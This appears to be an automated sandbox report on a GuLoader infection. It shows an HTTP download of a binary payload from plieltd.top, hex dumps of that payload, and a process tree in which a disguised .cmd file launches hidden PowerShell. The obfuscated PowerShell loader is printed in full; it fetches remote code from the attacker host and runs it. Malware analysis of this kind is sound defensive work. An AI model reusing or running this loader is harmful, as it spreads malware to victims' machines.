                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                              Host: plieltd.top
                                                                                                                                              Cache-Control: no-cache
2024-10-21 06:34:38 UTC | 998 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Mon, 21 Oct 2024 06:34:38 GMT
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Content-Length: 494656
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Sat, 19 Oct 2024 21:19:22 GMT
                                                                                                                                              ETag: "78c40-624daf93301e5"
                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                              CF-Cache-Status: REVALIDATED
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4sbs7Ko1d%2FbY%2B8P0oe%2BlKhRkCbAGwLcg7gYzH8ssfAZYZxqY7FW%2BPb1FnEQLtrW4g7sAvJNXFzcjcd8ok%2F%2BA3zalbPS%2Fz93OXOUb%2F7fvK%2BvFhxPU5EFbAfQGirWyFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8d5f391618c16c1f-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1289&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=813&delivery_rate=2222563&cwnd=251&unsent_bytes=0&cid=2d7875e682168c12&ts=556&x=0"
                                                                                                                                              2024-10-21 06:34:38 UTC371INData Raw: 22 0d a6 00 e9 11 cf 30 4d f4 9e 9c 77 b1 52 bd 2c 45 4a 80 f0 45 77 0b e8 af 7a 5a af 33 82 7d e6 e4 f1 af 98 2a eb 41 27 79 21 20 6e 15 db d4 d4 40 e7 ef ae 15 30 e6 62 00 2c 66 ea 40 e7 d6 a0 ca 09 d6 fc 32 1e 09 d0 d1 00 62 bb 79 17 03 8b d6 b6 7d 77 05 57 90 0d 14 65 2d b5 c8 f6 96 bc d6 aa 25 8e 78 f3 2c c5 07 21 3f 5d af 9a f0 67 61 ea 64 57 a2 5f 8a 99 21 d1 31 16 47 81 02 11 33 88 b0 19 b3 9a ac bd ad c4 90 6f 71 7f 88 3e 21 27 b1 f0 f1 29 df 2a b8 ce ae 91 91 4b 9f f8 b2 13 79 58 e9 80 4f a2 ce fd 2b b2 28 b3 1c 5c 57 24 08 de a7 29 17 cc 14 e5 d8 1f 3d a5 10 e8 f8 17 df de 46 36 00 c4 44 7f a8 58 4a 27 34 7a f3 2b ed a1 89 38 47 4f b0 f9 43 db d6 37 73 8d a3 10 85 0c 12 82 e1 e9 61 b3 1b be 20 11 1d cf 45 75 01 4d 52 03 49 12 71 aa 00 86 0c c3
                                                                                                                                              Data Ascii: "0MwR,EJEwzZ3}*A'y! n@0b,f@2by}wWe-%x,!?]gadW_!1G3oq>!')*KyXO+(\W$)=F6DXJ'4z+8GOC7sa EuMRIq
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: 8f 89 27 df 59 de af e4 af df 09 64 88 a7 61 0e ad ae 95 c7 9e 1e 15 2d b2 36 9a 73 03 95 bf e2 da 9b cd 2f 6b 7b a4 fa af d4 b3 bf da 31 4d 35 3e cb 43 cb c0 2d 6f 8d 9a 31 24 bc 96 4a b8 ad 97 2d e5 2c 76 01 b3 94 2e 53 81 b7 81 1c 29 b6 2c 8f c8 4b 28 63 b0 5f 7d ba 39 c3 53 7c 4d c3 e0 cc 4d 7b 50 6e 0f a3 42 f2 60 16 27 3f b3 f8 09 d1 3b 4f 2b 20 f1 91 39 a8 cf d5 e7 22 62 b9 bd cb 99 ed 00 9c 4a d6 0d cd f1 5b a4 f2 dc ff 74 e4 45 29 6e 1c 6e bc d4 d9 b4 d7 a6 01 ae e2 43 7a 94 fe 39 df e4 07 51 9a 47 c3 54 59 07 7b 1f e8 b0 bc bb a5 ad e9 cb 84 8e 9b 1a 8f 78 1f 30 c1 62 b0 1a 57 16 c5 91 1b 82 9f 19 76 e8 9e c7 08 87 09 eb 2b 54 30 11 66 7c 0f 33 df d5 a2 01 e3 c3 f7 a2 3e 90 f3 cb 51 01 0e a0 db 3a a6 92 e4 58 25 1e ba 82 5a 88 b5 f7 0f a4 e2 67
                                                                                                                                              Data Ascii: 'Yda-6s/k{1M5>C-o1$J-,v.S),K(c_}9S|MM{PnB`'?;O+ 9"bJ[tE)nnCz9QGTY{x0bWv+T0f|3>Q:X%Zg
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: 88 5e 15 c6 02 f7 dc 3e be 19 6f 4b e1 d9 15 2d bd 97 53 2b b9 94 eb 87 92 c5 9e a6 9e 45 d5 ee a5 12 7f 60 f0 64 d9 44 1f 78 c2 36 4b 82 1e bb 66 b1 67 08 e8 bb 38 40 ae 9a aa 9d 85 bb 53 e5 30 39 09 a5 10 8c 72 2f b7 96 b4 c6 4b 8f 5e f0 15 a9 48 a5 0d 86 9d f4 9e fa 93 86 c2 33 73 dc d5 24 f9 e2 0d 28 e6 5e fb e3 38 00 d8 a8 eb 19 56 f7 3a af 66 98 ba 64 97 ff 7c d6 37 ae f6 c6 b7 80 51 15 91 a2 00 b0 3d 00 d4 c2 e3 42 39 5d 19 94 a8 e1 42 0d 9c 98 7b 92 f6 3c ef ef 60 2f f6 7d 25 01 2d d7 0a ff ed 98 69 76 32 0d 82 36 05 b2 e2 2a c5 89 71 c9 f1 33 08 e7 11 f3 0d 03 c9 0c 03 61 4a b6 d6 f1 ac 0a cb 73 be 67 9c e0 0e 30 5e b0 c0 16 b2 ae 75 68 50 bf 89 be 0e 93 d3 b4 6b 87 99 f6 19 37 f5 51 24 f8 e3 c7 7d 2c d4 84 ac 2c aa d9 72 ed bc 89 55 b2 18 5f fc
                                                                                                                                              Data Ascii: ^>oK-S+E`dDx6Kfg8@S09r/K^H3s$(^8V:fd|7Q=B9]B{<`/}%-iv26*q3aJsg0^uhPk7Q$},,rU_
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: f8 2a 8f 3a ea 34 6e df 3c c3 3e b3 24 77 d8 06 31 27 d9 55 26 53 62 21 90 a8 bd b5 54 75 69 fc 8d 13 43 35 66 3e 32 76 78 2a a2 64 9d 34 58 ee ba 55 d7 29 3c 1e ac a0 19 17 38 23 36 cc 94 f3 95 a8 c1 19 fa 95 f8 e0 5c 6a 07 b1 28 23 f8 93 39 b1 99 82 4d 98 62 82 89 cb ab 27 36 16 15 5b 99 e7 54 90 4b d9 43 7a 5b d6 7a 12 6b 46 15 f9 45 b6 be ba a6 2c 35 99 9c 4b c8 10 ea 6f 0c 58 5d ca 63 38 1b dc 14 1c 69 b4 0f 38 6f 8c 7d 3b ce 1a 3a a1 56 d7 16 49 fb 02 0d a2 eb 0b d7 36 d1 29 81 41 53 48 6e 9e c0 e0 76 dc 34 79 8e 5e 86 de 4d 84 f1 c9 d6 f1 9d fc ef 33 29 3d fb de d6 00 6b 6b 13 87 5a cf 8a 01 a8 17 03 5b 66 c9 38 77 ed 12 bf 4e 14 3c 7b 5d 90 dd 95 bc 8f 27 69 aa 68 1b 3e cd 07 21 b4 18 a3 b7 4e 64 61 ea 6b d3 d8 5e 8a 99 69 52 d9 0f 49 04 74 1e 2c
                                                                                                                                              Data Ascii: *:4n<>$w1'U&Sb!TuiC5f>2vx*d4XU)<8#6\j(#9Mb'6[TKCz[zkFE,5KoX]c8i8o};:VI6)ASHnv4y^M3)=kkZ[f8wN<{]'ih>!Ndak^iRIt,
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: fc 55 73 07 62 53 a5 b9 fa 93 f3 e4 a1 c1 a4 d5 e6 55 57 b3 99 f9 5d 81 3a b1 d3 25 6a 29 fc e1 46 88 0b 3c 17 4d b1 16 86 e7 ca 30 d0 52 c3 22 f4 53 70 af 06 3a db e0 ad 57 d1 f6 42 16 3c 7d f0 f1 a8 b2 ee 98 fd 5d c6 4a d7 ba bf a6 53 b1 2c de 41 c6 cc ff 58 a6 e4 5c cf f3 b1 9c c8 ee e7 a9 ce ce b8 5d 46 87 9a 66 06 18 ea 2c 7c 40 d2 cb 46 66 53 7b eb d0 51 83 da 14 9d 16 03 5c 6d 69 31 37 45 00 0c 37 f7 1e 4a 87 f4 18 2b 79 f1 54 4a f5 1a 0b da c8 6c 8e e5 18 ab 3d e0 de 49 ec d9 ee a5 c8 4d fc 33 5d 93 ff b5 04 19 71 da e9 04 81 74 d4 4b 85 92 08 ec d4 6f a9 51 13 2d 43 6b 88 61 00 c9 76 33 10 d4 39 94 24 ee 71 13 67 7f 9a ae b8 f6 75 fd b0 f0 f2 32 63 52 65 6f 8f 68 8e 78 d9 02 d1 79 66 7e 98 5e a3 66 f3 47 00 95 15 b2 f7 84 ec 57 e9 4c 91 ed 97 f2
                                                                                                                                              Data Ascii: UsbSUW]:%j)F<M0R"Sp:WB<}]JS,AX\]Ff,|@FfS{Q\mi17E7J+yTJl=IM3]qtKoQ-Ckav39$qgu2cReohxyf~^fGWL
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: 5c cc a1 37 d5 cf 79 90 99 75 62 cd bf 7a f8 78 26 3e b4 79 cd 39 aa fb c5 a6 9c 35 0f 4c a9 c7 a4 a6 65 e4 d9 85 fa ca 6a 17 a3 4a e6 a8 5e 85 23 f4 47 6b ae 41 1d cc 92 52 66 d5 ca 28 08 58 d5 ea e0 a5 a7 41 12 f3 29 8f f8 5f 42 2f bb f3 ae b1 eb cc 5d 4d 7e 9f 45 f8 63 56 c3 d9 8c 3a bf 66 f4 b4 59 a6 04 6c cf 9a 95 12 e8 21 07 ad 5c c1 e5 bc c2 ba 8d c8 8b ab 24 3e cb 08 02 b0 44 a2 83 3d b7 41 b8 7e c4 c3 4b 58 41 8f 38 bf 1f 31 12 0a 99 7a 62 92 0b c3 f8 f4 68 8c 53 8c e7 35 41 d6 77 e5 a4 57 74 e7 f8 b0 ff 32 b1 3a bf a5 e8 b5 7d 52 0d fc d6 c9 a1 ff 31 93 b9 5e 78 19 50 68 6f d6 b5 d3 4a 59 3a 2f a0 59 4c 6e e4 a0 6a 17 cc dd 10 d5 5a 3c a3 b7 2b 09 6b 9e f8 db c0 f4 3a 97 bc 79 07 8a e7 ae 65 da 26 d9 19 93 80 c3 af 7b 00 cc fd 55 dc e4 ba e5 8c
                                                                                                                                              Data Ascii: \7yubzx&>y95LejJ^#GkARf(XA)_B/]M~EcV:fYl!\$>D=A~KXA81zbhS5AwWt2:}R1^xPhoJY:/YLnjZ<+k:ye&{U
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: ec 4a b0 13 1b 71 54 52 35 3a 1a dc 46 da ab 08 42 da 7d 64 27 1a bb c5 dc d6 20 4d cb 07 f0 69 79 ff 39 d0 8f 52 4c 0c 71 31 68 ce 30 0c d6 e0 91 03 41 4f b1 0b 0d bb 32 ad 64 f1 49 02 cf ca a7 99 57 a0 01 b1 bf 59 e2 69 56 49 fb a9 d5 4e e2 71 02 7d 88 2e 9c 32 f4 6e 55 6f 23 50 6e d7 60 b9 45 d8 5e 2a c4 1e 48 de 92 09 26 c5 0b a1 c8 22 09 93 93 df a2 fc d1 45 9d 5e 20 11 39 ea 48 ed 28 41 1b 9b 78 4f 0b 09 81 ad 44 82 d3 9b 83 9f 43 39 bd 06 a9 e5 3e 04 28 aa 77 f0 58 59 ba 67 31 3b 1b a5 b9 03 72 f6 32 34 04 e2 bf 27 fa 74 36 bd 21 ad 1f f2 3f 3d 57 f1 71 d2 78 56 23 df 06 ed 1d bb 51 cb c2 b0 64 b5 02 58 ad 8e 4f 1e e0 c0 04 44 20 ab d3 af 04 ca ae 3a 2e c1 de 4e 9e 63 7a 52 b7 67 a6 1e 0a f2 3b df 73 f1 01 08 0a 57 a1 0f ac a8 09 10 e4 8e 6d cc 09
                                                                                                                                              Data Ascii: JqTR5:FB}d' Miy9RLq1h0AO2dIWYiVINq}.2nUo#Pn`E^*H&"E^ 9H(AxODC9>(wXYg1;r24't6!?=WqxV#QdXOD :.NczRg;sWm
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: cb 99 64 45 70 6d 94 f1 04 ca 5b a4 1a 54 d4 34 dc 86 aa 23 e0 91 37 a9 31 3f a2 ae 8a f3 ee c6 a1 e0 e5 6a b0 f8 e9 83 76 b8 3c 04 2e a1 91 f7 be b3 bc bb fc fd 01 45 6c 71 64 99 4b e4 70 30 ab 66 3b d5 bf 2a 33 6e e4 0f da f5 26 63 51 2f a1 74 f6 14 7b bc c0 13 66 7c 56 63 7a 6e 2f 1e 63 3c 08 29 03 09 a3 c8 51 11 85 6f 33 99 5a 6d 1b d5 15 4d 31 4d b2 1d 4e 08 f0 2f af 93 2c 89 0c 5b 74 47 48 30 fb 06 66 73 28 6f a8 8a 18 90 af 35 8c 39 43 65 47 72 ad 91 dd 92 b4 f9 8f 4d 8e d0 f3 e6 a5 97 d5 a4 11 c7 c7 2b 27 9c 33 74 bb 4f 6f 09 c8 92 65 ba f3 1a 16 ea 57 02 ee 5b 84 3d 0d ac aa 98 9c 2f 81 68 8a 25 2f 11 c4 10 bb 47 8a 4f aa e7 47 bb 95 31 7d 5e dc 02 62 2a fd fa 36 88 ef 89 4f aa 90 1f 43 40 24 df 16 e9 c1 48 5d 60 c2 32 d3 e0 c1 ac b8 98 3d 6d 92
                                                                                                                                              Data Ascii: dEpm[T4#71?jv<.ElqdKp0f;*3n&cQ/t{f|Vczn/c<)Qo3ZmM1MN/,[tGH0fs(o59CeGrM+'3tOoeW[=/h%/GOG1}^b*6OC@$H]`2=m
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: 83 9d e4 91 40 e3 4f c2 e3 a7 67 b6 c9 c9 84 f2 e0 89 33 4f 5c fc 38 c3 6d 27 5f 97 f9 0a 46 b8 77 ae e9 da ed c1 03 69 01 de c7 81 d2 0b de 69 da 10 d5 9a bf 09 8a b0 33 b5 da c9 a1 5b d7 4f a1 f0 c5 5d 3b 73 69 49 87 cb 1b 93 62 19 94 cd 1d 2f bb 90 c2 3c c8 9d 73 a8 eb ce ee 6b 5e 1c 3f a5 bf 46 c5 ad c8 e2 89 9d b6 eb 76 33 46 d4 3d 64 f2 23 31 25 6b 70 76 be e5 d4 9b a9 b6 22 92 1d 8c 0a 27 2b 0d fd 23 c8 d7 76 77 85 28 b2 66 17 76 0b c5 22 af d6 73 ae 2f 6b 7e f4 76 ea 28 38 71 8a dc 3c c5 c1 34 13 46 8d 25 a7 c9 9a 31 20 ec 1d 84 50 75 94 2f e5 a7 30 5f 38 61 73 91 81 b7 eb e3 43 a6 d3 fb fc 5b 79 8b 6d 5b 7d aa fb cb 53 95 78 2f 1f 33 c6 3f 74 d2 6a ac 79 fe 6e 82 e7 fd 27 ff 82 dc fb 03 0f 24 da 90 e8 50 0d d1 e7 cb 8c 46 42 34 70 6b 05 9c aa 5a
                                                                                                                                              Data Ascii: @Og3O\8m'_Fwii3[O];siIb/<sk^?Fv3F=d#1%kpv"'+#vw(fv"s/k~v(8q<4F%1 Pu/0_8asC[ym[}Sx/3?tjyn'$PFB4pkZ
                                                                                                                                              2024-10-21 06:34:38 UTC1369INData Raw: 5a d6 26 32 76 60 f3 ae 74 ef d7 00 a3 ba 6b 26 ac 3c 82 a9 d4 52 e6 ef a0 1e 99 44 00 5a 9f 1d 71 12 f2 50 dc 5d ba db ea bc 34 28 93 0f 8e 3b 4a 02 df a1 77 e0 96 49 00 6c 74 18 66 5e cc 3e e5 c3 e1 f6 8b 5a c6 3f 1a dd d5 13 33 5d 78 95 22 f5 a8 6f 81 47 33 7a df c8 7d 67 54 fa 5a da 71 f3 af 08 dd 8c 6d 1b 49 fc 72 ee 97 9e 15 9b 23 86 43 01 d5 05 c9 62 e6 0d 70 fd e0 a7 fc 35 e1 ef 2f 88 63 ea 4c 98 86 48 a0 f0 dc 98 f0 10 b9 51 41 2b c0 d5 ee cd a5 72 09 ca 09 6d 05 66 12 9b a0 aa 4c 4f d0 fb 09 98 64 fc 45 54 cb 29 d4 b6 af d3 17 24 0d 48 f6 c2 5a 40 6f 4d 47 7a 7f a3 1f 7d 4b 0e 41 b6 cd af 0e c9 42 79 5b a8 8e b7 f2 4c 92 bd 12 d5 5b 25 1e f2 fc 29 0f 7e 81 07 11 46 23 cd e2 a6 a7 d2 9a 8a e6 00 34 97 30 95 2a c8 1c 2c f4 33 f0 0a fd 35 3a f3 4f
                                                                                                                                              Data Ascii: Z&2v`tk&<RDZqP]4(;JwIltf^>Z?3]x"oG3z}gTZqmIr#Cbp5/cLHQA+rmfLOdET)$HZ@oMGz}KABy[L[%)~F#40*,35:O


                                                                                                                                              Target ID:0
Start time: 02:33:57
Start date: 21/10/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMG465244247443GULFORDEROpmagasinering.cmd" "
Imagebase: 0x7ff77adc0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 02:33:57
Start date: 21/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 02:33:57
Start date: 21/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                                                                                                                              Commandline:powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. 
.hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. 
S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner 
(Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 3
Start time: 02:33:57
Start date: 21/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 02:34:08
Start date: 21/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
                                                                                                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. 
